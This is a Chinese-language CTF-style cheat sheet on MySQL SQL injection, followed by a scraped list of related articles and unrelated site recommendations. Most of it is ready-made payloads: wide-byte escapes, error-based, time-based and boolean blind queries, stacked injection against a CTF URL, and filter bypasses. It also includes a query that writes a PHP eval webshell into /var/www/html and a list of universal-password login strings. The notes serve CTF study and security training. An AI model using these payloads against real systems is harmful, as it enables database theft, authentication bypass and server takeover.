一、宽字节注入

  • 原理:GBK编码、URL转码

    利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围)

    例如:' -> ' -> %5C%27

    %df' -> %df' -> %df%5C%27

  • sql字符集特性

MYSQL 中 utf8_unicode_ci 和 utf8_general_ci 两种编码格式, utf8_general_ci不区分大小写, Ä = A, Ö = O, Ü = U 这三种条件都成立, 对于utf8_general_ci下面的等式成立:ß = s ,但是,对于utf8_unicode_ci下面等式才成立:ß = ss 。

可以看到大写O和Ö是相等的

  • SQL注入常用URL编码

    空格 %20

    ' %27

    # %23

    \ %5C

  • php-addslashes函数:在特殊字符前加上反斜线\来转义

  • 如何从addslashes函数逃逸?

    • \前面再加一个\,变成\\',这样\就被转义了
    • 把\弄没
  • 表名或列名可以使用16进制转码来实现

    例如:ctf -> 0x637466

    sqlmap中加参数--hex

二、基于约束的注入

  • 原理:超过数据类型长度的部分不会被插进表里,如果不将字段作为唯一字段,可以插入重复的数据
  • 例如:注册admin + 很多空格 + 1,成功以admin身份登录

三、报错注入

  • 公式

        and (select 1 from (select count(*),concat(user(),floor(rand(0)*2)x from information_schema.tables group by x)a));
    
        or updatexml(1,concat(0x7e,(version())),0)//最大长度是32位
    
        and extractvalue(1,concat(0x7e,(select database())))
    
        and exp(~(select * from (select user())a));
    
        and updatexml(1,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,41),1)

四、时间盲注

  • 原理:能够截取字符串,同时触发延时即可

    SELECT * FROM table WHERE id = 1 AND (if(SUBSTR(database(),1,1)=' ',sleep(5),null))

    SELECT * FROM table WHERE id = 1 AND (if(acsii(substr(database(),1,1))=100,sleep(5),null))

  • 相关函数

    • 延时方法

      • SLEEP(duration)

      • BENCHMARK(count,expr)



        例如select benchmark(10000000,sha(1))

      • 笛卡尔积

        例如SELECT count(*) FROM information_schema.columns A,information_schema.columns B, information_schema.tables C;

        ps:COUNT(*)计算行数

      • GET_LOCK(str,timeout)

        需要开启两个会话才能生效

      • RLIKE

        通过rpad或repeat构造长字符串,加以计算量大的pattern,通过repeat的参数可以控制延时长短

        例如select concat(rpad(1,9999999,'a'),rpad(1,9999999,'a'),···,rpad(1,9999999,'a')) RLIKE '(a.*)+(a.*)+···+(a.*)+b

    • 条件

      • IF(expr1,expr2,expr3)

      • CASE WHEN [condition] when [result]

    • 字符串截取

      • SUBSTR(SUBSTRING)

        substr同substring,有多种参数选择

        SUBSTRING(str,pos), SUBSTRING(str FROM pos), SUBSTRING(str,pos,len), SUBSTRING(str FROM pos FOR len)

      • MID(str,pos,len)同SUBSTRING(str,pos,len)

      • SUBSTRING_INDEX(str,delim,count)

      • LEFT(str,len)

    • 字符串转换

      • ASCII()
      • ORD()
      • CHR()

五、bool盲注

  • 原理:利用回显的消息不同,判断输入表达式是否正确
  • 常用函数

    基本同时间盲注

六、order by的注入

使用ORDER BY子句对查询结果按一列或多列排序。

ORDER BY子句的语法格式为:

ORDER BY {column_name [ASC|DESC]}[,...n]

  • ORDER BY语句默认按照升序对记录进行排序
  • 在不知道列名的情况下可以通过列的序号来指代相应的列。但是这里无法做运算
  • 当ORDER BY注入能通过返回错误信息是,也可以考虑使用报错注入
  • 根据不同的列排序,会返回不同的结果,也可以使用类似于bool型盲注的形式来注入
  • ORDER BY后面字段可以通过位运算符(|&^~)来使代码被执行,例如

    select * from xxx order by id|(sleep(5))
  • ORDER BY在括号中时后面可以跟UNION,例如

    (select 1,2,3 order by 3 asc)union(select 2,3,4)

六、INSERT、UPDATE、DELETE相关的注入

  • INSERT

    例如:insert into users (id,username,password) values (2,'attacker' or updatexml(1,concat(0x7e,database()),0), 'password')

  • UPDATE

    例如:update users set password='password' or updatexml(1,concat(0x7e,database()),0) where id=2

  • delete

    例如:delete from users where id=2 or updatexml(1,concat(0x7e,database()),0)

七、堆叠注入

PDO场景下的SQL注入探究

  • 原理:利用;结束语句并插入自己的sql语句
  • 适用:
    • Mysql、SqlServer、Postgresql(Oracle不行)
    • 只有当调用数据库函数支持执行多条sql语句时才能够使用,例如mysqli_multi_query()函数就支持多条sql语句同时执行
    • PDO默认支持多语句查询,如果php版本小于5.5.21或者创建PDO实例时未设置PDO::MYSQL_ATTR_MULTI_STATEMENTS为false时可能会造成堆叠注入
  • 例子

    利用存储过程绕过select过滤
    http://web16.buuoj.cn/?      inject=1%27;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare%20execsql%20from%20@a;execute%20execsql;#
    使用了大小写绕过strstr($inject, "set") && strstr($inject, "prepare")
    去掉URL编码后
    ?inject=1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

八、二次注入

用这样的payload将数据带出来

0'^(select hex(hex(substr((select * from flag) from {i} for 1))))^'0

两次hex是为了将第一次hex中的字母变成数字,substr是因为如果hex的值太大,sql会变成科学计数法,丢失精度

九、文件读写

select @@secure_file_priv

secure_file_priv

  • 1、限制mysqld 不允许导入 | 导出

    --secure_file_prive=null
  • 2、限制mysqld 的导入 | 导出 只能发生在/tmp/目录下

    --secure_file_priv=/tmp/
  • 3、不对mysqld 的导入 | 导出做限制

    --secure_file_priv=

load_file读文件

写文件

select 0x3C3F706870206576616C28245F524551554553545B2761275D293B203F3E into outfile '/var/www/html/1.php'
# <?php eval($_REQUEST['a']); ?>

十、常用绕过

SQL注入绕过技巧

  • 空格

    • /**/
  • =
    • like
    • regexp
    • !(<>)
  • '
    • 转义符\
    • 16进制(例如:ctf -> 0x637466)
    • union注入使用join,例如3' union select * from (select 1) a join (select 2 ) b %23
    • substr from for
    • if->case when

其它重要绕过参考:SQL注入有趣姿势总结

Sql注入笔记

SQL注入之骚姿势小记

sql注入总结(一)--2018自我整理

十一、万能密码

select * from admin where username = '' and password = ''

username password
admin'#
'+' '+'
aaa'=' aaa'='
1\ '^'1
'%1#
'=0#

CTF SQL注入的更多相关文章

  1. 一次简单的ctf SQL注入绕过

    注入地址:http://103.238.227.13:10087/index.php?id=1 //过滤sql $array = array('table','union','and','or','l ...

  2. CTF SQL注入知识点

    理解常用的登录判断 select * from user where username='admin' and password='123' 数据库元信息 infomation_schema 懂PHP ...

  3. CTF比赛中SQL注入的一些经验总结

    ctf中sql注入下的一些小技巧 最近花了一点时间总结了各大平台中注入的trick,自己还是太菜了,多半都得看题解,就特此做了一个paper方便总结 注释符 以下是Mysql中可以用到的单行注释符: ...

  4. union注入的几道ctf题,实验吧简单的sql注入1,2,这个看起来有点简单和bugku的成绩单

    这几天在做CTF当中遇到了几次sql注入都是union,写篇博客记录学习一下. 首先推荐一篇文章“https://blog.csdn.net/Litbai_zhang/article/details/ ...

  5. CTF—WEB—sql注入之宽字节注入

     宽字节注入 宽字节注入是利用mysql的一个特性,mysql在使用GBK编码(GBK就是常说的宽字节之一,实际上只有两字节)的时候,会认为两个字符是一个汉字(前一个ascii码要大于128,才到汉字 ...

  6. CTF—WEB—sql注入之无过滤有回显最简单注入

    sql注入基础原理 一.Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手 ...

  7. “百度杯”CTF比赛 十月场-Getflag(md5碰撞+sql注入+网站绝对路径)

    进去md5碰撞,贴一下脚本代码 import hashlib def md5(value): return hashlib.md5(str(value).encode("utf-8" ...

  8. sql注入、csrf

    ◎sql注入产生的原因?又如何防御sql注入? SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.具体来说,它是利用现有应用 ...

  9. sql注入总结(一)--2018自我整理

    SQL注入总结 前言: 本文和之后的总结都是进行总结,详细实现过程细节可能不会写出来~ 所有sql语句均是mysql数据库的,其他数据库可能有些函数不同,但是方法大致相同 0x00 SQL注入原理: ...

随机推荐

  1. 【转载】C#中double.TryParse方法和double.Parse方法的异同之处

    在C#编程过程中,double.TryParse方法和double.Parse方法都可以将字符串string转换为double类型,但两者还是有区别,最重要的区别在于double.TryParse方法 ...

  2. linux下svn解决冲突

    1. 使用svn status + 文件路径+文件名 查看文件或目录的状态(该状态可自行进行百度),属性状态为'C'的表示,改文件或目录处于冲突状态 2. 使用svn resolve --accept ...

  3. linux设备驱动程序-设备树(0)-dtb格式

    linux设备树dtb格式 设备树的一般操作方式是:开发人员根据开发需求编写dts文件,然后使用dtc将dts编译成dtb文件. dts文件是文本格式的文件,而dtb是二进制文件,在linux启动时被 ...

  4. 【实战3】记一次内网中反弹shell的艰难历程

    # 0x00 前言 最近在客户现场对内网服务器进行渗透测试,发现了大量的弱口令,本次历程就是从这里开始··· # 0x01 弱口令 对目标ip进行端口扫描,开放端口为80,445,1433,3389- ...

  5. Codeforces B. Mouse Hunt(强连通分解缩点)

    题目描述: Mouse Hunt time limit per test 2 seconds memory limit per test 256 megabytes input standard in ...

  6. C.Minimum Array(二分+set)

    题目描述: 知识点: lower_bound和uper_bound lower_bound(起始地址,结束地址,要查找的数值) 返回的是数值 第一个 出现的位置. upper_bound(起始地址,结 ...

  7. 微信小程序~上拉加载onReachBottom

    代码: //页面上拉触底事件的处理函数 onReachBottom(e) { console.log("底部")// 滚动到页面执行 该 方法 wx.showToast({ tit ...

  8. sql中如何获取一条数据中所有字段的名称和值

    declare ) ) --获取表的列名 ,),filename INTO #templist FROM (select cl.name as filename from sys.tables AS ...

  9. 洛谷:P1783 海滩防御(二分+并查集 最短路 最小生成树)

    题意: 给定长度为N的海滩,然后有M做防御塔,给出每座塔的位置Xi,到海岸的距离Yi. 求防御塔上最小观测半径Ri,使得海滩被封锁. 思路:要使左边界和右边界连通. 很nice,可以二分+并查集做. ...

  10. java SSM面试题

    1. 谈谈你mvc的理解MVC是Model—View—Controler的简称.即模型—视图—控制器.MVC是一种设计模式,它强制性的把应用程序的输入.处理和输出分开.MVC中的模型.视图.控制器它们 ...